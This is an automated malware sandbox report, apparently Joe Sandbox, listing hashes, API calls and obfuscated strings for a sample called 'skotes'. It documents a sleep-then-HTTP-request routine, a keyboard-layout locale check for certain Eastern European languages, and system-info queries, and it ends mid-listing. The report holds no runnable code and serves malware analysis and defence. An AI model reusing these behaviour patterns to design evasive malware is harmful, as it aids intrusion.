                                                  • Opcode Fuzzy Hash: 87ffe7fccdb2454fa26fa45983aabd46f549ad815a22559f20aab903429f2ab1
                                                  • Instruction Fuzzy Hash: 2F211AAB14C135BE7245C5C12B5CAFA66EFE5D67307318826F802D4C82E2D94E5A1932
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: de64dd813fc2536cbddc2b2f7e6b30a196db06282c440b27183f5f155dff39d2
                                                  • Instruction ID: 058c09be5c875aacf8a3be638d6733045c6b655f7afcf833076195057831dfe8
                                                  • Opcode Fuzzy Hash: de64dd813fc2536cbddc2b2f7e6b30a196db06282c440b27183f5f155dff39d2
                                                  • Instruction Fuzzy Hash: 931126AB14C135BE714AC5C12B58AFA66EFE1C56303318826F803E4D82E2D94E6A5932
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6c61a40256c828499d3e225b126812a6802c498611707dc3ecf1d913b04c00fa
                                                  • Instruction ID: c6b9712f536b5c3dded784955a7443e047830a5a64a4f635634dd09ff9b15087
                                                  • Opcode Fuzzy Hash: 6c61a40256c828499d3e225b126812a6802c498611707dc3ecf1d913b04c00fa
                                                  • Instruction Fuzzy Hash: 7E118FFB10C161BFB245C6C13B59AFB67AFE5D6730331881BF443D4982D2984E6A5932
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8849aaff97b7f360dbc988f0f8e66a9ab2355a461456629de32a3d18d4c6af0e
                                                  • Instruction ID: 7c914d1cfafe23e505915d0eab63ca00d22f8cbba4d6bb03cc7f64db9c9ad14f
                                                  • Opcode Fuzzy Hash: 8849aaff97b7f360dbc988f0f8e66a9ab2355a461456629de32a3d18d4c6af0e
                                                  • Instruction Fuzzy Hash: 121118AB10C131BE7145C5C22B58AFA66AFE1D57313318827F807D4C82E3D84F6E2932
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 02ecdb61d2cffae42f29991e4c1e3bcc8be232490a688738d3340257f4128878
                                                  • Instruction ID: bbee410f02291cf62fcefca86273ea6b05440e17498ee7254d515b581b3365d1
                                                  • Opcode Fuzzy Hash: 02ecdb61d2cffae42f29991e4c1e3bcc8be232490a688738d3340257f4128878
                                                  • Instruction Fuzzy Hash: 371191BB10C131BE7249C1D12B59AFAABAFE4C57303318427F442D4C82D3D84E9A5972
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cd95e6d2a2a36b8b1736825574e007026c6ad732387699291aa5915323eded4c
                                                  • Instruction ID: 2a79ae2ac43a962066f69e5be1f9b30345da983600fdaad4aa42bdaabe30281c
                                                  • Opcode Fuzzy Hash: cd95e6d2a2a36b8b1736825574e007026c6ad732387699291aa5915323eded4c
                                                  • Instruction Fuzzy Hash: 3B1157EB10C031BEB249C5C22B18AFA57AFE1D57307318827F802D4882D2D94EAA1932
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3372e3f23c5e962038b9e63a4cd6dbe28e92678999b3fecdfd536644c011d7dd
                                                  • Instruction ID: 071f9a96ff07adbb81c6dd79369a824a356ea686c16dec264262e78ae11a75c1
                                                  • Opcode Fuzzy Hash: 3372e3f23c5e962038b9e63a4cd6dbe28e92678999b3fecdfd536644c011d7dd
                                                  • Instruction Fuzzy Hash: 10014CFB10C135BE7245C1C12B59AFA57AFE4C5B703318827F802E5C86D3C94EAA1832
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1bcaafcd87e7fb971b60b5b5edb030258c9e5394d3c7e991190344f86c00268e
                                                  • Instruction ID: 65c4a1ead7024922ad89e7a89a1e45d219c47f9a656566706b19b640d45c3ee2
                                                  • Opcode Fuzzy Hash: 1bcaafcd87e7fb971b60b5b5edb030258c9e5394d3c7e991190344f86c00268e
                                                  • Instruction Fuzzy Hash: 81019EEB10C170AE7209D1C13BA9EFB27EED5C5B30331C957F442D5886D2D84EAA5932
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 03141fe3900f9d261423673a6681466cad9f3b388d401fb0ee41c57508eecf9d
                                                  • Instruction ID: fc73246313a351783065401a5fbe2837110673d74d7b9672060c4a2f4ebf1f00
                                                  • Opcode Fuzzy Hash: 03141fe3900f9d261423673a6681466cad9f3b388d401fb0ee41c57508eecf9d
                                                  • Instruction Fuzzy Hash: 990192FB10C070BE7245C1C13F59AFA67AED5C57303308857F442D4882D2D90E6E5932
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a4c4bce4805ae53c4183eaa4150f0330f23cc801d3a456c7deaf149fc5f9231c
                                                  • Instruction ID: 704ae9fcd966a3f54f82f6fa4155ed7b9f5ef4801947abfe1db6be580ccc50e5
                                                  • Opcode Fuzzy Hash: a4c4bce4805ae53c4183eaa4150f0330f23cc801d3a456c7deaf149fc5f9231c
                                                  • Instruction Fuzzy Hash: C7F0A5BB10C121AE7154C5823B69EFA63AEE5D4B31371C82BF442D0846D29989AA5932
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ee6ce1c8c4185ecdf7121967be944c07938834c91d814fe0b3b70aabbc2048fe
                                                  • Instruction ID: a805e58cb8b2733e6bc2d48eb10d30336102a519d9b42e42144a6a81de0c90bc
                                                  • Opcode Fuzzy Hash: ee6ce1c8c4185ecdf7121967be944c07938834c91d814fe0b3b70aabbc2048fe
                                                  • Instruction Fuzzy Hash: EDF0827760C1219E6218D5923769AFA63EEE4C0730731843BF043C2842D799456E5932
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 83e3aacd809fb4c2bbb1908f0021f809fa4c4363b5d4e19559961783dd1b1b1b
                                                  • Instruction ID: a2fe4d791ae68efe68f7f3d810bbad695d17a997468dddae5f9616139cd1d08b
                                                  • Opcode Fuzzy Hash: 83e3aacd809fb4c2bbb1908f0021f809fa4c4363b5d4e19559961783dd1b1b1b
                                                  • Instruction Fuzzy Hash: F9D017BB10C020AE7154D5C63B2DAFA63FEE5D0730732C82BF082C0882D69849AE5D33
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a6b01746541b4a9e822988fdbc15703aef0a553f8e4405e685b3f0a6fee2481
                                                  • Instruction ID: 85e474458748ef12fbba224601ab848e7d8b920fce9c9221b1f78263f1e3c539
                                                  • Opcode Fuzzy Hash: 8a6b01746541b4a9e822988fdbc15703aef0a553f8e4405e685b3f0a6fee2481
                                                  • Instruction Fuzzy Hash: 17D0C9BB10C020BD30A4D5823B1DBFB63AEE0D0A31371C817F442D1C82E689496D6971
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2196211083.00000000053E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_53e0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: KC
                                                  • API String ID: 0-1422302447
                                                  • Opcode ID: 7d319a7fb1c0caaa8c2c11ea6a10d7916f8035d10624613884737bd6a3853f4b
                                                  • Instruction ID: c5bab1981966980baec37b7d26d41380137e82d081df5162cd50ce6704b3c390
                                                  • Opcode Fuzzy Hash: 7d319a7fb1c0caaa8c2c11ea6a10d7916f8035d10624613884737bd6a3853f4b
                                                  • Instruction Fuzzy Hash: 174191EB24C231BD7106C5522F5CAFB6BAEE5C7730334843AF846C69C2E2D84E4A5172

                                                  Execution Graph

                                                  Execution Coverage:7.3%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:10.7%
                                                  Total number of Nodes:347
                                                  Total number of Limit Nodes:10
                                                  Execution graph (rendered graph; the node and edge listing spilled into the text has been condensed). Entry nodes in the listing: d96629, d6e0c0 (recv), d67430, d68780, d71ec0, d76c70, d7a210, d787d0, d793e0, d7b92e, d7b8b9. API calls reached along the graph: recv, GetSystemTimePreciseAsFileTime, InitOnceExecuteOnce, RtlAllocateHeap, GetPEB, RtlWakeAllConditionVariable, SleepConditionVariableCS, RegOpenKeyExA, RegEnumValueA, Sleep, InternetOpenW, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, GetNativeSystemInfo, CreateThreadpoolWork, TpPostWork, TpReleaseWork, TpCallbackUnloadDllOnCompletion.

                                                  Control-flow Graph

                                                  Control-flow graph of function d6be30 (rendered graph with executed / not-executed block colouring; block and edge listing condensed). Basic blocks span d6be30-d6c170. API calls in the function: Sleep, InternetOpenW, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile. Subcalls: d780c0, d77a00, d65c10, d7d663, d7cff1, d96c6a, d94250.
                                                  APIs
                                                  • Sleep.KERNELBASE(000005DC), ref: 00D6BEB8
                                                  • InternetOpenW.WININET(00DB8DC8,00000000,00000000,00000000,00000000), ref: 00D6BEC7
                                                  • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00D6BEEC
                                                  • HttpOpenRequestA.WININET(?,00000000), ref: 00D6BF36
                                                  • HttpSendRequestA.WININET(?,00000000), ref: 00D6BFF6
                                                  • InternetReadFile.WININET(?,?,000003FF,?), ref: 00D6C0A8
                                                  • InternetCloseHandle.WININET(?), ref: 00D6C187
                                                  • InternetCloseHandle.WININET(?), ref: 00D6C18F
                                                  • InternetCloseHandle.WININET(?), ref: 00D6C197
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
                                                  • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$RmNn$invalid stoi argument$stoi argument out of range
                                                  • API String ID: 2167506142-2254971868
                                                  • Opcode ID: 00c1335ed0b2aa781634118692d474fea64d90b33bc755316ca7a9f46ca56be0
                                                  • Instruction ID: 15b624b952b2ade46a41d025a950956a0ebb171a2275fbd713cad6ea5aa820fb
                                                  • Opcode Fuzzy Hash: 00c1335ed0b2aa781634118692d474fea64d90b33bc755316ca7a9f46ca56be0
                                                  • Instruction Fuzzy Hash: ECB1E3B06102189FDB28CF28CC84BAEBBB5EF45304F5085A9F549972D1DB759AC4CBB4
                                                  APIs
                                                    • Part of subcall function 00D77A00: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00D77AEC
                                                    • Part of subcall function 00D77A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00D77AF8
                                                    • Part of subcall function 00D77A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00D77B01
                                                    • Part of subcall function 00D6BE30: Sleep.KERNELBASE(000005DC), ref: 00D6BEB8
                                                    • Part of subcall function 00D6BE30: InternetOpenW.WININET(00DB8DC8,00000000,00000000,00000000,00000000), ref: 00D6BEC7
                                                    • Part of subcall function 00D6BE30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00D6BEEC
                                                    • Part of subcall function 00D6BE30: HttpOpenRequestA.WININET(?,00000000), ref: 00D6BF36
                                                  • std::_Xinvalid_argument.LIBCPMT ref: 00D74F92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestSleepXinvalid_argumentstd::_
                                                  • String ID: 2I0$ 3I3eB==$ GE0$ jS=$246122658369$8WI0$9250$93E0$9HQ0$9c9aa5$Fw==$KCWUOl==$MGE+$MGI+$VXA0$VXQ0$Vmc0$WGS0$aWW0$anE0$stoi argument out of range
                                                  • API String ID: 4201286991-1982281295
                                                  • Opcode ID: 5edc225660627690c17763df9460d7e4ff1234299d16e28afcb5518b2c6c638e
                                                  • Instruction ID: d465746c53e972d8415348ea992ce9bd9b8b0a6bc5aebf2c1a4b5770cc6c42a9
                                                  • Opcode Fuzzy Hash: 5edc225660627690c17763df9460d7e4ff1234299d16e28afcb5518b2c6c638e
                                                  • Instruction Fuzzy Hash: FC23E271A002588BEB19DB28CD8979DBBB6DF81304F54C1D8E04DA7286FB759B848F71

                                                  Control-flow Graph

                                                  Control-flow graph of function d65ee0 (rendered graph with executed / not-executed block colouring; block and edge listing condensed). Basic blocks span d65ee0-d665df. API calls in the function: RegOpenKeyExA, RegEnumValueA. Subcalls: d7cff1, d7d663, d96c6a, d7e150, d780c0, d940f0, d77a00, d65d50.
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                  • API String ID: 0-3963862150
                                                  • Opcode ID: dcda553cd86e8fced8a84f8f1c6eee9441769f40f4c3b085db820e2fbdb16682
                                                  • Instruction ID: 08b1200775e39ad112b7fb0e656a4ba1c1e6d16f3632bdfc22ff27c74ed2f464
                                                  • Opcode Fuzzy Hash: dcda553cd86e8fced8a84f8f1c6eee9441769f40f4c3b085db820e2fbdb16682
                                                  • Instruction Fuzzy Hash: 8DD1A1719002589BEB24DF54CC89BDEB7B9EF04300F5442D9F509E7291DB74ABA88FA4

                                                  Control-flow Graph

                                                  Control-flow graph of function d67d30 (rendered graph with executed / not-executed block colouring; block and edge listing condensed). Basic blocks span d67d30-d6837f. API call in the function: GetNativeSystemInfo. Subcalls: d940f0, d7cff1, d77a00, d65c10, d7d663, d96c6a, d65d50, d65730, d98bbe.
                                                  APIs
                                                  • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D67ED3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoNativeSystem
                                                  • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
                                                  • API String ID: 1721193555-3123340372
                                                  • Opcode ID: 43371ff447e4123cae7d62aafe376e29917b015d64891903145be2f69d16a21d
                                                  • Instruction ID: 369600cad772916844ed5a9073171200601ab90a1e818b120af96274790d9bbf
                                                  • Opcode Fuzzy Hash: 43371ff447e4123cae7d62aafe376e29917b015d64891903145be2f69d16a21d
                                                  • Instruction Fuzzy Hash: A8E10670E002459BDB24BB28DC0B7AD7B61EB41724F94469CE419A73C2EF354E958BF2

                                                  Control-flow Graph

                                                  Control-flow graph of function d9d634 (rendered graph with executed / not-executed block colouring; block and edge listing condensed). Basic blocks span d9d634-d9d88b. API call in the function: RtlAllocateHeap. Subcalls: d7df80, d9a7c8, d9d5be, d9d57c, d975f6, d96c5a, d98dc8, d9d7c7, d98e10, d965ed, d9d62b, d9a671, d99dc0, d98e36.
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 272613a6458b16905feab86ce495901f4269570ef7a7cc90f26e31cbe6471323
                                                  • Instruction ID: 140653a47ecf41257d512bd862fcb99344c6847f8eb4ee9143c23eaea9ea5a45
                                                  • Opcode Fuzzy Hash: 272613a6458b16905feab86ce495901f4269570ef7a7cc90f26e31cbe6471323
                                                  • Instruction Fuzzy Hash: E961E432D002189FDF25EFA8D8856EDB7B2EF55310F2D811AE85AAB251D7319C40CBB1

                                                  Control-flow Graph (graph rendering not reproduced)
                                                  APIs
                                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 00D68524
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379749901.000000000120F000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379849356.0000000001211000.00000080.00000001.01000000.00000007.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_d60000_skotes.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InfoNativeSystem
                                                  • String ID:
                                                  • API String ID: 1721193555-0
                                                  • Opcode ID: e1f04c2db16270607995af576a70337b2bb7102db5cfcff051183d2dbe64c5d1
                                                  • Instruction ID: b6d0cdac38da05d38407e971fcc65959b3c61d945fb598f9ef3dff3ced3e0c0d
                                                  • Opcode Fuzzy Hash: e1f04c2db16270607995af576a70337b2bb7102db5cfcff051183d2dbe64c5d1
                                                  • Instruction Fuzzy Hash: 88512770D002089BDB28EB68CD49BDEB775EB45310F5043A9E409A72C1EF759EC48BB1

                                                  Control-flow Graph (graph rendering not reproduced)
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,00D9A72D,?,?,?,00D9666A,?,00D66F28,00000000,00000000,766545D9), ref: 00D9D871
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.3378692573.0000000000D61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D60000, based on PE: true
                                                  • Associated: 00000006.00000002.3378621502.0000000000D60000.00000004.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378692573.0000000000DC2000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378806124.0000000000DC9000.00000008.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000DCB000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000000F4C000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000102D000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.000000000105A000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001067000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3378866908.0000000001075000.00000040.00000001.01000000.00000007.sdmp
                                                  • Associated: 00000006.00000002.3379425764.0000000001076000.00000080.00000001.01000000.00000007.sdmp
